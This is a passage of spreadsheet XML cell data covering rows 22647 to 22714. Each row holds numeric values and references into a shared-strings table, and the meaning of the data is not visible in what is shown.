      <c r="C22647" s="2" t="s">
        <v>21871</v>
      </c>
      <c r="D22647" s="2">
        <v>1.0</v>
      </c>
      <c r="E22647" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22647" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22648" ht="15.75" customHeight="1">
      <c r="A22648" s="1">
        <v>5822.0</v>
      </c>
      <c r="B22648" s="2">
        <v>4.6867766E7</v>
      </c>
      <c r="C22648" s="2" t="s">
        <v>21872</v>
      </c>
      <c r="D22648" s="2">
        <v>1.0</v>
      </c>
      <c r="E22648" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22648" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22649" ht="15.75" customHeight="1">
      <c r="A22649" s="1">
        <v>6606.0</v>
      </c>
      <c r="B22649" s="2">
        <v>4.9016981E7</v>
      </c>
      <c r="C22649" s="2" t="s">
        <v>21873</v>
      </c>
      <c r="D22649" s="2">
        <v>1.0</v>
      </c>
      <c r="E22649" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22649" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22650" ht="15.75" customHeight="1">
      <c r="A22650" s="1">
        <v>6619.0</v>
      </c>
      <c r="B22650" s="2">
        <v>4.9035412E7</v>
      </c>
      <c r="C22650" s="2" t="s">
        <v>21874</v>
      </c>
      <c r="D22650" s="2">
        <v>1.0</v>
      </c>
      <c r="E22650" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22650" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22651" ht="15.75" customHeight="1">
      <c r="A22651" s="1">
        <v>6728.0</v>
      </c>
      <c r="B22651" s="2">
        <v>4.9317551E7</v>
      </c>
      <c r="C22651" s="2" t="s">
        <v>21875</v>
      </c>
      <c r="D22651" s="2">
        <v>1.0</v>
      </c>
      <c r="E22651" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22651" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22652" ht="15.75" customHeight="1">
      <c r="A22652" s="1">
        <v>6893.0</v>
      </c>
      <c r="B22652" s="2">
        <v>4.978501E7</v>
      </c>
      <c r="C22652" s="2" t="s">
        <v>21876</v>
      </c>
      <c r="D22652" s="2">
        <v>1.0</v>
      </c>
      <c r="E22652" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22652" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22653" ht="15.75" customHeight="1">
      <c r="A22653" s="1">
        <v>6973.0</v>
      </c>
      <c r="B22653" s="2">
        <v>5.0008136E7</v>
      </c>
      <c r="C22653" s="2" t="s">
        <v>21877</v>
      </c>
      <c r="D22653" s="2">
        <v>1.0</v>
      </c>
      <c r="E22653" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22653" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22654" ht="15.75" customHeight="1">
      <c r="A22654" s="1">
        <v>7060.0</v>
      </c>
      <c r="B22654" s="2">
        <v>5.0209658E7</v>
      </c>
      <c r="C22654" s="2" t="s">
        <v>21878</v>
      </c>
      <c r="D22654" s="2">
        <v>1.0</v>
      </c>
      <c r="E22654" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22654" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22655" ht="15.75" customHeight="1">
      <c r="A22655" s="1">
        <v>7113.0</v>
      </c>
      <c r="B22655" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C22655" s="2" t="s">
        <v>21879</v>
      </c>
      <c r="D22655" s="2">
        <v>1.0</v>
      </c>
      <c r="E22655" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22655" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22656" ht="15.75" customHeight="1">
      <c r="A22656" s="1">
        <v>7133.0</v>
      </c>
      <c r="B22656" s="2">
        <v>5.0439744E7</v>
      </c>
      <c r="C22656" s="2" t="s">
        <v>21880</v>
      </c>
      <c r="D22656" s="2">
        <v>1.0</v>
      </c>
      <c r="E22656" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22656" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22657" ht="15.75" customHeight="1">
      <c r="A22657" s="1">
        <v>7164.0</v>
      </c>
      <c r="B22657" s="2">
        <v>5.0496424E7</v>
      </c>
      <c r="C22657" s="2" t="s">
        <v>21881</v>
      </c>
      <c r="D22657" s="2">
        <v>1.0</v>
      </c>
      <c r="E22657" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22657" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22658" ht="15.75" customHeight="1">
      <c r="A22658" s="1">
        <v>7655.0</v>
      </c>
      <c r="B22658" s="2">
        <v>5.1795973E7</v>
      </c>
      <c r="C22658" s="2" t="s">
        <v>21882</v>
      </c>
      <c r="D22658" s="2">
        <v>1.0</v>
      </c>
      <c r="E22658" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22658" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22659" ht="15.75" customHeight="1">
      <c r="A22659" s="1">
        <v>7962.0</v>
      </c>
      <c r="B22659" s="2">
        <v>5.2680257E7</v>
      </c>
      <c r="C22659" s="2" t="s">
        <v>21883</v>
      </c>
      <c r="D22659" s="2">
        <v>1.0</v>
      </c>
      <c r="E22659" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22659" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22660" ht="15.75" customHeight="1">
      <c r="A22660" s="1">
        <v>7996.0</v>
      </c>
      <c r="B22660" s="2">
        <v>5.2777186E7</v>
      </c>
      <c r="C22660" s="2" t="s">
        <v>21884</v>
      </c>
      <c r="D22660" s="2">
        <v>1.0</v>
      </c>
      <c r="E22660" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22660" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22661" ht="15.75" customHeight="1">
      <c r="A22661" s="1">
        <v>8186.0</v>
      </c>
      <c r="B22661" s="2">
        <v>5.3249769E7</v>
      </c>
      <c r="C22661" s="2" t="s">
        <v>21885</v>
      </c>
      <c r="D22661" s="2">
        <v>1.0</v>
      </c>
      <c r="E22661" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22661" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22662" ht="15.75" customHeight="1">
      <c r="A22662" s="1">
        <v>8312.0</v>
      </c>
      <c r="B22662" s="2">
        <v>5.3620687E7</v>
      </c>
      <c r="C22662" s="2" t="s">
        <v>21886</v>
      </c>
      <c r="D22662" s="2">
        <v>1.0</v>
      </c>
      <c r="E22662" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22662" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22663" ht="15.75" customHeight="1">
      <c r="A22663" s="1">
        <v>8433.0</v>
      </c>
      <c r="B22663" s="2">
        <v>5.3946286E7</v>
      </c>
      <c r="C22663" s="2" t="s">
        <v>21887</v>
      </c>
      <c r="D22663" s="2">
        <v>1.0</v>
      </c>
      <c r="E22663" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22663" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22664" ht="15.75" customHeight="1">
      <c r="A22664" s="1">
        <v>8487.0</v>
      </c>
      <c r="B22664" s="2">
        <v>5.4040975E7</v>
      </c>
      <c r="C22664" s="2" t="s">
        <v>21888</v>
      </c>
      <c r="D22664" s="2">
        <v>1.0</v>
      </c>
      <c r="E22664" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22664" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22665" ht="15.75" customHeight="1">
      <c r="A22665" s="1">
        <v>8491.0</v>
      </c>
      <c r="B22665" s="2">
        <v>5.404336E7</v>
      </c>
      <c r="C22665" s="2" t="s">
        <v>21889</v>
      </c>
      <c r="D22665" s="2">
        <v>1.0</v>
      </c>
      <c r="E22665" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22665" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22666" ht="15.75" customHeight="1">
      <c r="A22666" s="1">
        <v>8736.0</v>
      </c>
      <c r="B22666" s="2">
        <v>5.4527668E7</v>
      </c>
      <c r="C22666" s="2" t="s">
        <v>21890</v>
      </c>
      <c r="D22666" s="2">
        <v>1.0</v>
      </c>
      <c r="E22666" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22666" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22667" ht="15.75" customHeight="1">
      <c r="A22667" s="1">
        <v>8842.0</v>
      </c>
      <c r="B22667" s="2">
        <v>5.4694001E7</v>
      </c>
      <c r="C22667" s="2" t="s">
        <v>21891</v>
      </c>
      <c r="D22667" s="2">
        <v>1.0</v>
      </c>
      <c r="E22667" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22667" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22668" ht="15.75" customHeight="1">
      <c r="A22668" s="1">
        <v>8892.0</v>
      </c>
      <c r="B22668" s="2">
        <v>5.4786883E7</v>
      </c>
      <c r="C22668" s="2" t="s">
        <v>21892</v>
      </c>
      <c r="D22668" s="2">
        <v>1.0</v>
      </c>
      <c r="E22668" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22668" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22669" ht="15.75" customHeight="1">
      <c r="A22669" s="1">
        <v>9462.0</v>
      </c>
      <c r="B22669" s="2">
        <v>5.585532E7</v>
      </c>
      <c r="C22669" s="2" t="s">
        <v>21893</v>
      </c>
      <c r="D22669" s="2">
        <v>1.0</v>
      </c>
      <c r="E22669" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22669" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22670" ht="15.75" customHeight="1">
      <c r="A22670" s="1">
        <v>9469.0</v>
      </c>
      <c r="B22670" s="2">
        <v>5.585532E7</v>
      </c>
      <c r="C22670" s="2" t="s">
        <v>21894</v>
      </c>
      <c r="D22670" s="2">
        <v>1.0</v>
      </c>
      <c r="E22670" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22670" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22671" ht="15.75" customHeight="1">
      <c r="A22671" s="1">
        <v>9509.0</v>
      </c>
      <c r="B22671" s="2">
        <v>5.5955076E7</v>
      </c>
      <c r="C22671" s="2" t="s">
        <v>21895</v>
      </c>
      <c r="D22671" s="2">
        <v>1.0</v>
      </c>
      <c r="E22671" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22671" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22672" ht="15.75" customHeight="1">
      <c r="A22672" s="1">
        <v>9580.0</v>
      </c>
      <c r="B22672" s="2">
        <v>5.6089238E7</v>
      </c>
      <c r="C22672" s="2" t="s">
        <v>21896</v>
      </c>
      <c r="D22672" s="2">
        <v>1.0</v>
      </c>
      <c r="E22672" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22672" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22673" ht="15.75" customHeight="1">
      <c r="A22673" s="1">
        <v>9585.0</v>
      </c>
      <c r="B22673" s="2">
        <v>5.6098708E7</v>
      </c>
      <c r="C22673" s="2" t="s">
        <v>21897</v>
      </c>
      <c r="D22673" s="2">
        <v>1.0</v>
      </c>
      <c r="E22673" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22673" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22674" ht="15.75" customHeight="1">
      <c r="A22674" s="1">
        <v>9843.0</v>
      </c>
      <c r="B22674" s="2">
        <v>5.666673E7</v>
      </c>
      <c r="C22674" s="2" t="s">
        <v>21898</v>
      </c>
      <c r="D22674" s="2">
        <v>1.0</v>
      </c>
      <c r="E22674" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22674" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22675" ht="15.75" customHeight="1">
      <c r="A22675" s="1">
        <v>9889.0</v>
      </c>
      <c r="B22675" s="2">
        <v>5.67595E7</v>
      </c>
      <c r="C22675" s="2" t="s">
        <v>21899</v>
      </c>
      <c r="D22675" s="2">
        <v>1.0</v>
      </c>
      <c r="E22675" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22675" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22676" ht="15.75" customHeight="1">
      <c r="A22676" s="1">
        <v>9947.0</v>
      </c>
      <c r="B22676" s="2">
        <v>5.6885777E7</v>
      </c>
      <c r="C22676" s="2" t="s">
        <v>21900</v>
      </c>
      <c r="D22676" s="2">
        <v>1.0</v>
      </c>
      <c r="E22676" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22676" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22677" ht="15.75" customHeight="1">
      <c r="A22677" s="1">
        <v>10075.0</v>
      </c>
      <c r="B22677" s="2">
        <v>5.7148162E7</v>
      </c>
      <c r="C22677" s="2" t="s">
        <v>21901</v>
      </c>
      <c r="D22677" s="2">
        <v>1.0</v>
      </c>
      <c r="E22677" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22677" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22678" ht="15.75" customHeight="1">
      <c r="A22678" s="1">
        <v>10078.0</v>
      </c>
      <c r="B22678" s="2">
        <v>5.7148162E7</v>
      </c>
      <c r="C22678" s="2" t="s">
        <v>21902</v>
      </c>
      <c r="D22678" s="2">
        <v>1.0</v>
      </c>
      <c r="E22678" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22678" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22679" ht="15.75" customHeight="1">
      <c r="A22679" s="1">
        <v>10140.0</v>
      </c>
      <c r="B22679" s="2">
        <v>5.7305907E7</v>
      </c>
      <c r="C22679" s="2" t="s">
        <v>21903</v>
      </c>
      <c r="D22679" s="2">
        <v>1.0</v>
      </c>
      <c r="E22679" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22679" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22680" ht="15.75" customHeight="1">
      <c r="A22680" s="1">
        <v>10255.0</v>
      </c>
      <c r="B22680" s="2">
        <v>5.7554924E7</v>
      </c>
      <c r="C22680" s="2" t="s">
        <v>21904</v>
      </c>
      <c r="D22680" s="2">
        <v>1.0</v>
      </c>
      <c r="E22680" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22680" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22681" ht="15.75" customHeight="1">
      <c r="A22681" s="1">
        <v>10341.0</v>
      </c>
      <c r="B22681" s="2">
        <v>5.7732422E7</v>
      </c>
      <c r="C22681" s="2" t="s">
        <v>21905</v>
      </c>
      <c r="D22681" s="2">
        <v>1.0</v>
      </c>
      <c r="E22681" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22681" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22682" ht="15.75" customHeight="1">
      <c r="A22682" s="1">
        <v>10605.0</v>
      </c>
      <c r="B22682" s="2">
        <v>1.363118E7</v>
      </c>
      <c r="C22682" s="2" t="s">
        <v>21906</v>
      </c>
      <c r="D22682" s="2">
        <v>1.0</v>
      </c>
      <c r="E22682" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22682" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22683" ht="15.75" customHeight="1">
      <c r="A22683" s="1">
        <v>10736.0</v>
      </c>
      <c r="B22683" s="2">
        <v>1.5348648E7</v>
      </c>
      <c r="C22683" s="2" t="s">
        <v>21907</v>
      </c>
      <c r="D22683" s="2">
        <v>1.0</v>
      </c>
      <c r="E22683" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22683" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22684" ht="15.75" customHeight="1">
      <c r="A22684" s="1">
        <v>10847.0</v>
      </c>
      <c r="B22684" s="2">
        <v>1.6173436E7</v>
      </c>
      <c r="C22684" s="2" t="s">
        <v>21908</v>
      </c>
      <c r="D22684" s="2">
        <v>1.0</v>
      </c>
      <c r="E22684" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22684" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22685" ht="15.75" customHeight="1">
      <c r="A22685" s="1">
        <v>10967.0</v>
      </c>
      <c r="B22685" s="2">
        <v>1.7255229E7</v>
      </c>
      <c r="C22685" s="2" t="s">
        <v>21909</v>
      </c>
      <c r="D22685" s="2">
        <v>1.0</v>
      </c>
      <c r="E22685" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22685" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22686" ht="15.75" customHeight="1">
      <c r="A22686" s="1">
        <v>11151.0</v>
      </c>
      <c r="B22686" s="2">
        <v>1.9380126E7</v>
      </c>
      <c r="C22686" s="2" t="s">
        <v>21910</v>
      </c>
      <c r="D22686" s="2">
        <v>1.0</v>
      </c>
      <c r="E22686" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22686" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22687" ht="15.75" customHeight="1">
      <c r="A22687" s="1">
        <v>11169.0</v>
      </c>
      <c r="B22687" s="2">
        <v>1.9645866E7</v>
      </c>
      <c r="C22687" s="2" t="s">
        <v>21911</v>
      </c>
      <c r="D22687" s="2">
        <v>1.0</v>
      </c>
      <c r="E22687" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22687" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22688" ht="15.75" customHeight="1">
      <c r="A22688" s="1">
        <v>11941.0</v>
      </c>
      <c r="B22688" s="2">
        <v>2.5534803E7</v>
      </c>
      <c r="C22688" s="2" t="s">
        <v>21912</v>
      </c>
      <c r="D22688" s="2">
        <v>1.0</v>
      </c>
      <c r="E22688" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22688" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22689" ht="15.75" customHeight="1">
      <c r="A22689" s="1">
        <v>11950.0</v>
      </c>
      <c r="B22689" s="2">
        <v>2.5559875E7</v>
      </c>
      <c r="C22689" s="2" t="s">
        <v>21913</v>
      </c>
      <c r="D22689" s="2">
        <v>1.0</v>
      </c>
      <c r="E22689" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22689" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22690" ht="15.75" customHeight="1">
      <c r="A22690" s="1">
        <v>11965.0</v>
      </c>
      <c r="B22690" s="2">
        <v>2.5675371E7</v>
      </c>
      <c r="C22690" s="2" t="s">
        <v>21914</v>
      </c>
      <c r="D22690" s="2">
        <v>1.0</v>
      </c>
      <c r="E22690" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22690" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22691" ht="15.75" customHeight="1">
      <c r="A22691" s="1">
        <v>12028.0</v>
      </c>
      <c r="B22691" s="2">
        <v>2.6173425E7</v>
      </c>
      <c r="C22691" s="2" t="s">
        <v>21915</v>
      </c>
      <c r="D22691" s="2">
        <v>1.0</v>
      </c>
      <c r="E22691" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22691" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22692" ht="15.75" customHeight="1">
      <c r="A22692" s="1">
        <v>12088.0</v>
      </c>
      <c r="B22692" s="2">
        <v>2.6706477E7</v>
      </c>
      <c r="C22692" s="2" t="s">
        <v>21916</v>
      </c>
      <c r="D22692" s="2">
        <v>1.0</v>
      </c>
      <c r="E22692" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22692" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22693" ht="15.75" customHeight="1">
      <c r="A22693" s="1">
        <v>12344.0</v>
      </c>
      <c r="B22693" s="2">
        <v>2.8626926E7</v>
      </c>
      <c r="C22693" s="2" t="s">
        <v>21917</v>
      </c>
      <c r="D22693" s="2">
        <v>1.0</v>
      </c>
      <c r="E22693" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22693" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22694" ht="15.75" customHeight="1">
      <c r="A22694" s="1">
        <v>12398.0</v>
      </c>
      <c r="B22694" s="2">
        <v>2.8931885E7</v>
      </c>
      <c r="C22694" s="2" t="s">
        <v>21918</v>
      </c>
      <c r="D22694" s="2">
        <v>1.0</v>
      </c>
      <c r="E22694" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22694" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22695" ht="15.75" customHeight="1">
      <c r="A22695" s="1">
        <v>12606.0</v>
      </c>
      <c r="B22695" s="2">
        <v>3.0147489E7</v>
      </c>
      <c r="C22695" s="2" t="s">
        <v>21919</v>
      </c>
      <c r="D22695" s="2">
        <v>1.0</v>
      </c>
      <c r="E22695" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22695" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22696" ht="15.75" customHeight="1">
      <c r="A22696" s="1">
        <v>12730.0</v>
      </c>
      <c r="B22696" s="2">
        <v>3.0985329E7</v>
      </c>
      <c r="C22696" s="2" t="s">
        <v>21920</v>
      </c>
      <c r="D22696" s="2">
        <v>1.0</v>
      </c>
      <c r="E22696" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22696" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22697" ht="15.75" customHeight="1">
      <c r="A22697" s="1">
        <v>12800.0</v>
      </c>
      <c r="B22697" s="2">
        <v>3.1415314E7</v>
      </c>
      <c r="C22697" s="2" t="s">
        <v>21921</v>
      </c>
      <c r="D22697" s="2">
        <v>1.0</v>
      </c>
      <c r="E22697" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22697" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22698" ht="15.75" customHeight="1">
      <c r="A22698" s="1">
        <v>12835.0</v>
      </c>
      <c r="B22698" s="2">
        <v>3.1677536E7</v>
      </c>
      <c r="C22698" s="2" t="s">
        <v>21922</v>
      </c>
      <c r="D22698" s="2">
        <v>1.0</v>
      </c>
      <c r="E22698" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22698" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22699" ht="15.75" customHeight="1">
      <c r="A22699" s="1">
        <v>12960.0</v>
      </c>
      <c r="B22699" s="2">
        <v>3.246889E7</v>
      </c>
      <c r="C22699" s="2" t="s">
        <v>21923</v>
      </c>
      <c r="D22699" s="2">
        <v>1.0</v>
      </c>
      <c r="E22699" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22699" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22700" ht="15.75" customHeight="1">
      <c r="A22700" s="1">
        <v>13187.0</v>
      </c>
      <c r="B22700" s="2">
        <v>3.4080355E7</v>
      </c>
      <c r="C22700" s="2" t="s">
        <v>21924</v>
      </c>
      <c r="D22700" s="2">
        <v>1.0</v>
      </c>
      <c r="E22700" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22700" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22701" ht="15.75" customHeight="1">
      <c r="A22701" s="1">
        <v>13291.0</v>
      </c>
      <c r="B22701" s="2">
        <v>3.4455688E7</v>
      </c>
      <c r="C22701" s="2" t="s">
        <v>21925</v>
      </c>
      <c r="D22701" s="2">
        <v>1.0</v>
      </c>
      <c r="E22701" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22701" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22702" ht="15.75" customHeight="1">
      <c r="A22702" s="1">
        <v>13347.0</v>
      </c>
      <c r="B22702" s="2">
        <v>3.4694622E7</v>
      </c>
      <c r="C22702" s="2" t="s">
        <v>21926</v>
      </c>
      <c r="D22702" s="2">
        <v>1.0</v>
      </c>
      <c r="E22702" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22702" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22703" ht="15.75" customHeight="1">
      <c r="A22703" s="1">
        <v>13418.0</v>
      </c>
      <c r="B22703" s="2">
        <v>3.5033615E7</v>
      </c>
      <c r="C22703" s="2" t="s">
        <v>21927</v>
      </c>
      <c r="D22703" s="2">
        <v>1.0</v>
      </c>
      <c r="E22703" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22703" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22704" ht="15.75" customHeight="1">
      <c r="A22704" s="1">
        <v>13429.0</v>
      </c>
      <c r="B22704" s="2">
        <v>3.5089307E7</v>
      </c>
      <c r="C22704" s="2" t="s">
        <v>21928</v>
      </c>
      <c r="D22704" s="2">
        <v>1.0</v>
      </c>
      <c r="E22704" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22704" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22705" ht="15.75" customHeight="1">
      <c r="A22705" s="1">
        <v>13431.0</v>
      </c>
      <c r="B22705" s="2">
        <v>3.5094261E7</v>
      </c>
      <c r="C22705" s="2" t="s">
        <v>21929</v>
      </c>
      <c r="D22705" s="2">
        <v>1.0</v>
      </c>
      <c r="E22705" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22705" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22706" ht="15.75" customHeight="1">
      <c r="A22706" s="1">
        <v>13584.0</v>
      </c>
      <c r="B22706" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C22706" s="2" t="s">
        <v>21930</v>
      </c>
      <c r="D22706" s="2">
        <v>1.0</v>
      </c>
      <c r="E22706" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22706" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22707" ht="15.75" customHeight="1">
      <c r="A22707" s="1">
        <v>13861.0</v>
      </c>
      <c r="B22707" s="2">
        <v>3.6933779E7</v>
      </c>
      <c r="C22707" s="2" t="s">
        <v>21931</v>
      </c>
      <c r="D22707" s="2">
        <v>1.0</v>
      </c>
      <c r="E22707" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22707" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22708" ht="15.75" customHeight="1">
      <c r="A22708" s="1">
        <v>14046.0</v>
      </c>
      <c r="B22708" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C22708" s="2" t="s">
        <v>21932</v>
      </c>
      <c r="D22708" s="2">
        <v>1.0</v>
      </c>
      <c r="E22708" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22708" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22709" ht="15.75" customHeight="1">
      <c r="A22709" s="1">
        <v>14338.0</v>
      </c>
      <c r="B22709" s="2">
        <v>3.8794822E7</v>
      </c>
      <c r="C22709" s="2" t="s">
        <v>21933</v>
      </c>
      <c r="D22709" s="2">
        <v>1.0</v>
      </c>
      <c r="E22709" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22709" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22710" ht="15.75" customHeight="1">
      <c r="A22710" s="1">
        <v>14400.0</v>
      </c>
      <c r="B22710" s="2">
        <v>3.9174444E7</v>
      </c>
      <c r="C22710" s="2" t="s">
        <v>21934</v>
      </c>
      <c r="D22710" s="2">
        <v>1.0</v>
      </c>
      <c r="E22710" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22710" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22711" ht="15.75" customHeight="1">
      <c r="A22711" s="1">
        <v>14535.0</v>
      </c>
      <c r="B22711" s="2">
        <v>3.9835333E7</v>
      </c>
      <c r="C22711" s="2" t="s">
        <v>21935</v>
      </c>
      <c r="D22711" s="2">
        <v>1.0</v>
      </c>
      <c r="E22711" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22711" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22712" ht="15.75" customHeight="1">
      <c r="A22712" s="1">
        <v>14756.0</v>
      </c>
      <c r="B22712" s="2">
        <v>4.079527E7</v>
      </c>
      <c r="C22712" s="2" t="s">
        <v>21936</v>
      </c>
      <c r="D22712" s="2">
        <v>1.0</v>
      </c>
      <c r="E22712" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22712" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22713" ht="15.75" customHeight="1">
      <c r="A22713" s="1">
        <v>14796.0</v>
      </c>
      <c r="B22713" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C22713" s="2" t="s">
        <v>21937</v>
      </c>
      <c r="D22713" s="2">
        <v>1.0</v>
      </c>
      <c r="E22713" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22713" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22714" ht="15.75" customHeight="1">
      <c r="A22714" s="1">
        <v>14797.0</v>
      </c>
      <c r="B22714" s="2">
        <v>4.0922281E7</v>
      </c>
